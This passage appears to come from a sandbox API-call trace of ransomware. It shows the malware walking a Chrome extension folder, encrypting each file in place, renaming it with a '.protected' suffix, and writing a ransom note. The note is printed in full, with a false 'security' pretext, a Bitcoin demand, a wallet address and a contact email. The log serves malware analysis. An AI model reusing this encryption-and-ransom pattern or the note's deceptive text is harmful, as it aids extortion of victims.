pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png") returned 139 [0079.675] StrStrW (lpFirst="128.png", lpSrch=".txt") returned 0x0 [0079.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png") returned 139 [0079.675] StrStrW (lpFirst="128.png", lpSrch=".rar") returned 0x0 [0079.676] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png") returned 139 [0079.676] StrStrW (lpFirst="128.png", lpSrch=".zip") returned 0x0 [0079.676] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0xd4e, lpOverlapped=0x0) returned 1 [0079.695] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffff2b2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.695] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xd4e, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0xd4e, lpOverlapped=0x0) returned 1 [0079.695] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.695] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.695] WriteFile 
(in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.695] CloseHandle (hObject=0x160) returned 1 [0079.696] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.protected") returned 149 [0079.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.protected")) returned 1 [0079.696] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.696] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0079.696] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0079.696] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0079.696] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0079.696] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0079.696] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json") returned 145 [0079.696] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0079.696] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.696] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.697] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.697] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json") returned 145 [0079.697] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0079.697] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json") returned 145 [0079.697] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0079.697] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json") returned 145 [0079.697] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 
0x0 [0079.697] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2d8, lpOverlapped=0x0) returned 1 [0079.698] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffd28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.698] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2d8, lpOverlapped=0x0) returned 1 [0079.698] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.698] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.699] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.699] CloseHandle (hObject=0x160) returned 1 [0079.699] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.protected") returned 155 [0079.699] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.protected")) returned 1 [0079.699] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.699] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0079.699] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0079.699] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0079.699] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0079.699] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0079.699] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales") returned 140 [0079.699] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0079.699] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0079.699] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\*") returned 142 [0079.699] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0079.701] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.701] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.701] lstrcmpiW 
(lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.701] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.701] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.701] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\.") returned 142 [0079.701] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.701] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.701] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.701] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.701] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.701] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.701] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.701] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\..") returned 143 [0079.701] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.701] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.701] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.701] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0079.701] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0079.701] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0079.701] lstrcmpiW (lpString1="ar", lpString2="$Recycle.bin") returned 1 [0079.701] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0079.701] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar") returned 143 [0079.701] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0079.701] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0079.701] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\*") returned 145 [0079.701] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.702] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.702] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.702] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.702] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.702] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.702] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\.") returned 145 [0079.702] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.702] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.702] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.702] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.702] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 
[0079.702] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.702] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.702] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\..") returned 146 [0079.702] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.702] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.702] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.702] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.702] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.702] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.702] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.702] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.702] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json") returned 157 [0079.702] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.702] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.702] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.702] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.703] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json") returned 157 [0079.703] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.703] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json") returned 157 [0079.703] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.703] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json") returned 157 [0079.703] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.703] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.703] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.703] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 
1 [0079.704] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.704] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.704] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.704] CloseHandle (hObject=0x168) returned 1 [0079.704] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.protected") returned 167 [0079.704] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.protected")) returned 1 [0079.705] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.705] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.705] wnsprintfW (in: 
pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\RESTORE_FILES.txt") returned 161 [0079.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.705] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.705] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.706] lstrlenA (lpString="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") returned 684 [0079.706] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.706] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.706] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.706] CloseHandle (hObject=0x164) returned 1 [0079.706] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.706] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0079.706] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0079.706] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0079.706] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0079.706] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0079.706] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg") returned 143 [0079.706] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0079.706] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0079.706] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\*") returned 145 [0079.706] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.707] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.707] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.707] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.707] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 